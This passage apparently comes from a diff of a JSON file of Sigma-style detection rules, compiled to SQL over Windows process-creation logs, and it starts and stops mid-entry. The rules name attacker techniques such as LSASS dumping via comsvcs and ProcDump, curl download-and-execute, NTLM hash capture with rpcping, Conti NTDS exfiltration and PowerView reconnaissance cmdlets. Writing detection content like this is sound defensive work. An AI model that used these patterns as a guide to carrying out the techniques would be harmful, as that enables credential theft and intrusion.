ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" }, { - "title": "Command Line Execution with Suspicious URL and AppData Strings", - "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", - 
"status": "test", - "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", - "tags": [ - "attack.execution", - "attack.command_and_control", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1105" + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "status": "experimental", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "High" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_http_appdata.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Audio Capture via PowerShell", - "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "title": "Capture Credentials with Rpcping.exe", + "id": 
"93671f99-04eb-4ab4-a161-70d446a84003", "status": "test", - "description": "Detects audio capture via PowerShell Cmdlet.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "test", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.execution", 
- "attack.t1047" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], - "level": "medium", + "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate MSSQL Server actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run Once Task Execution as Configured in Registry", + "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "status": "test", + "description": "This rule detects the execution of Run Once task as configured in the registry", + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_runonce_execution.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + 
"attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR 
CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR 
CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Legitimate uses of logon scripts distributed via group policy" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "status": "test", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later 
use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "status": "test", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Administrative scripts" ], "level": 
